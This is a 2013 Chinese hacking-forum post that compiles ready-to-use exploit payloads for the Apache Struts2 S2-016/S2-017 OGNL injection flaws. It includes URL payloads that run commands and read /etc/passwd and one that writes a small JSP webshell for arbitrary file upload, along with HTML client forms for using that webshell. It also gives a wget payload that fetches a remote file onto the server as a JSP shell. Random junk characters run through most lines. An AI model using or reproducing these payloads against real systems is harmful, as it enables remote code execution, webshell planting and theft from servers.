找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2675|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
' ]: I( L; S; z; o# t% q
  v" H3 H/ X4 S! H9 }6 |喜欢就点一下感谢吧^_^$ i7 \4 O( G0 `0 ?8 w
" }) R/ x1 Z/ O8 v
带回显命令执行:. M- l. `$ ~# F% K

7 C4 f7 X* f  {; r/ x, o3 r1 \http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+ [  z2 ?3 f8 j$ G' u
- R$ ?0 P5 y* Z) W
2 ?! K0 ^) k9 f: p7 g% a3 B, `" \5 P
( e4 Q# B( |# T2 N
' M1 ^. q3 z; A3 \0 x

7 y' G0 r% c' n) V
: i3 r  `6 L. ~# U8 D爆路径:
7 J- p3 l2 t  S9 f( c8 P- V6 ]  g1 a2 P; N4 y8 I
http://www.example.com/struts2-b ... 8%29.close%28%29%7D3 }* \7 W0 F4 o8 }$ Q7 C" M

3 A% U" B! h0 x
5 i. U9 v. ~- H* U& E$ |
1 _5 P9 P6 D4 u5 m+ M8 W
8 x1 K2 u7 [, A  l2 K0 b' G3 g  u" p; ?; Z+ M
写文件:( u$ r. L7 F/ C- s8 ~. X: [

( j: ?& L/ `' X0 u2 P- fhttp://www.example.com/struts2-blank/example/X.action?redirect:${6 g3 ~$ t, d* t. X

: y2 g3 F/ v# C' {%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
: Q# n# D8 i& c3 S5 |, V% ~  X6 Y1 R/ D9 ^/ b! G/ {
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),6 P: D& H  |1 Y4 H* M7 b

2 J2 H3 A, h, P8 E8 tnew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()5 J( n9 G2 g1 z) C7 c. S
" [6 i9 N) u7 v1 z/ M; r/ j; I
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
& A7 v" G" S0 L; g% q5 i$ d3 j- a: g9 Y4 x! G# c

5 I  u/ d6 K5 H# [" R" f4 P
  N* u) r$ j/ a写入的文件内容:
# d3 O; e+ y6 S, |8 U% C6 E. c  X( o6 M  i$ d
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
; u8 x% u4 n7 c, I! l
0 e) W* U/ W& D  R( A) u其实就是一个jsp的小马,需要客户端配合                                                                                 
( x# w9 }2 p" F0 v% E
' m0 U, `5 n* w: y: X& w' E* J函数f是文件名,t是内容& k2 N2 T% g$ y" t  t7 L

$ b; k$ t3 M2 ]1 Y) l/ c客户端:, o8 ?. ]2 @$ M( V5 F, [

9 f  d! O, o  Z# n+ a% N; P<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">& o+ M+ t9 l- |- j; O

/ D7 O" ^+ f$ F- v& ^$ n0 U' w<textarea name=t cols=120 rows=10 width=45>your code</textarea>/ y) J* d' ~7 |# ^, w
3 N$ D. w' ]0 i7 g$ s
<center>
6 L; N8 e- y( B4 T% n+ a5 F( Y2 U! H
) Y1 `0 Z8 K: ^" @; A' W1 `  E, z
1 r) ^1 B4 }" I/ e7 H* a, }& B# W9 A' Z, }# l1 E/ T0 R, @
<input type=submit value="提交">9 p0 S9 Q7 A& N0 T. d$ i! l

+ Y  ~8 L; Q. r</form>/ }' B+ n7 {1 H
9 P$ z0 a. K9 X/ K5 J- ^7 S
就在当前目录建立一个fjp.jsp
% b% N( k7 `0 p3 L6 |
( P" n1 C. Q8 z. E( n6 Wshell:http://www.example.com/struts2-blank/example/fjp.jsp
1 j$ r: O% i5 D
) g& I# R; s7 g9 q
' \4 Y, M6 o% v& F; V6 m1 m
! i4 W* n- E# w* r; X& ]还有@园长的一个客户端:4 V1 p; I( a7 l! p2 i  Q# ?

. z% a; T) W- k' P. y1 t- }<html>" p  s2 f  C8 S; e3 E' E

1 ^8 y3 l8 {' P. o: }8 }  m- t<head>
# h% z' L4 T+ i/ s' F
' E+ r, _) t5 Y; V<meta http-equiv="content-type" content="text/html;charset=utf-8">0 e3 c" k& B4 D& k3 V
# v! s. [# A0 ~. Y4 _9 n- b% |
<title>jsp-园长</title>! g+ v7 |. }# ~0 _& j  U
( i$ v6 K" j7 m- H5 y! `$ Z; N7 A# f
</head>; n- p8 T& v7 _" S
0 o7 ?8 Q( s4 N( F& M1 u
<style>9 Y+ _+ C% d  c  E* ^% A8 y
8 U- X# y. T0 P; |* ?3 a. z+ X0 s
.main{width:980px;height:600px;margin:0 auto;}
+ |9 L0 Z; s: [2 ?- H$ D
+ w2 B, \5 q/ l+ c( R.url{width:300px;}
' ^) Q) ~0 q# h9 O+ o* J
2 I# y7 c& l4 @- X( S2 s.fn{width:60px;}2 _+ _3 b  C5 \" o9 m

9 v4 V2 F: v9 v+ w9 N8 u! T.content{width:80%;height:60%;}8 V  d1 r0 O/ n+ c2 q6 m

. l4 Z$ [- j4 g- K% s! u% o' J# Y</style>5 m* x9 Q2 `$ G; E/ m- M4 p5 ]0 u5 x1 k; E
8 a3 z. m/ j; S5 J* S9 r) m6 U
<script>
* }9 P* V2 Y0 O- R3 f* P+ K% a7 `- P  V6 U2 u. r/ v/ P
  function upload(){- D3 |) K7 y) a

8 w; t3 }  s& m    var url = document.getElementById('url').value,' B+ `# T- ]% h3 O1 v: x

. ~. I4 g4 n+ T0 c" G8 B, S' h      content = document.getElementById('content').value,
- J1 J- y' m5 J
, a$ y6 J: A4 o( B% h      fileName = document.getElementById('fn').value,8 Q" y/ ~  {! l2 L, l

6 G) @( N( z, l2 l" P' R  |      form = document.getElementById('fm');
0 v8 M) Z/ z* s% T
! P, R& G7 l! ?+ p( s) M    if(url.length == 0){
" \5 z, n- F, ~: W
6 U  D+ B( h, V1 I7 \4 t" l      alert("Url not allowd empty!");5 m: l6 X7 W' I% q2 D
0 [8 J* V# }  |# b8 u; L$ ?, V
      return ;3 S; W' F% t) _5 D. G6 V. K
" \1 H$ w3 ?- h" m+ o' L4 `, ?
    }
4 d9 f/ _: e/ z) N# p7 \8 g7 }! D6 P3 i2 L6 l; l
    if(content.length == 0){
9 \# z& A' R% x/ ^/ N7 S9 G' v8 J+ z6 E0 S" k! M
      alert("Content not allowd empty!");) S: d( L& X) X' L
' Y( y" s- n& h# J
      return ;+ T0 S& [: {+ f0 {
: W( Y* H2 z3 m4 A2 n
    }+ t3 V6 y# G9 V4 i2 U+ d

  X8 N2 V: T0 A: _    if(fileName.length == 0){
( h/ l+ A$ R$ g
; D" S( l0 m( {7 Y, q4 ^: m* y      alert("FileName not allowd empty!");9 v' |- \1 \7 E# }) `

" @9 y4 H; R9 T& G; t" I      return ;
+ V/ W) w. x) h8 e
: s( A- m$ Z$ F8 C. s/ c& {    }
* M' a3 d2 v- ~$ N, g, }4 r' f* |
  f  E. W( S- g4 u0 i    form.action = url;$ {  M2 m( m& P

! `! l: G- }* X; y5 N# m    form.submit();% \) p# k% ?5 A& s. ]+ S* g
) r8 M+ P' J3 D6 n' h3 B% s8 {
  }
+ ~/ Q( I# L. l: W6 w' W8 u$ z8 ^2 |- c5 r# o: |8 ~+ w( W
</script>1 U4 c# A+ X6 f; I8 _; D

* C4 Z6 K0 a: F9 o0 e$ t: u# X<body>; e2 L* v' f1 P  K# L1 J# u* T+ \

9 p- T( A- v$ O2 ~<div class="main">, I% W' V, ?+ c* T. E  j

+ t2 G: W/ D1 z: z& H  <form id="fm" method="post">  
* z' q0 c2 g# v6 J1 O8 D
7 O) T1 ^- w( ]! P+ m    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  # P+ p- [! l' B+ F) s
: o/ P2 P! {! A, X% T
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ) q; I, s/ M2 b# a0 V

" N+ `  q: m( ~+ d& I    <a href="javascript:upload();">Upload</a>( e. _. H0 Y' A2 }
0 i( }; K! E; Q

' X% d# M  p; Y# T+ L& X6 x  Q' i
    <textarea id="content" class="content" name="t" ></textarea>
" `) f, \7 M6 X3 G3 v& G& H% y& B5 T7 `4 r3 t3 a
  </form>+ o; t( y* t$ X* _+ E6 P* Y; o/ v
' A. w2 S" G6 a% A6 }
</div>
9 O8 S8 R& F  Y3 C% Z0 B* `
6 t! r& B# K( S. {" c9 ^% E</body>2 S+ Y' n/ H& u
; j" x  E2 N1 O
</html>; e9 ~# W% C9 d* S& o+ m

+ C! [$ W# ]! M+ D4 h' @7 K
2 M' q2 Q1 Q7 O  H- k' j5 P; x) g7 o1 N
还有@X发的一个wget的getshell
0 J5 @- @5 k+ R1 x
9 J/ f+ t0 i2 X# b( u( u' [?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}0 }* L3 A0 b& x; _; H+ S9 t: Q$ E

# x- W4 e' w( v1 M+ t; q0 f)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}1 g$ h7 M; L7 I* p! e2 Z
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表